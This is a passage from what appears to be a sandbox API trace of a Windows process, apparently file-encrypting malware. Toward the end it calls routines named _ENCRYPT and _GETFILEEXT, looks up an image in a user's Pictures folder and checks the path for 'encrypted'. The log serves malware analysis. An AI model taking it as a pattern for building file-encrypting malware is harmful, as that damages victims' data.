hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0041.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.316] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.317] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.318] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.319] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.319] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0041.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.320] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.320] CloseHandle (hObject=0x128) returned 1 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.320] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.321] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.321] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.321] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.321] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.321] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.321] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.321] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.321] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.321] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.321] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x7e49c540, ftLastWriteTime.dwHighDateTime=0x1d5bd43, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 0x7c20c0 [0041.322] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.322] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x7e49c540, ftLastWriteTime.dwHighDateTime=0x1d5bd43, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 0x7c20c0 [0041.322] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.322] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 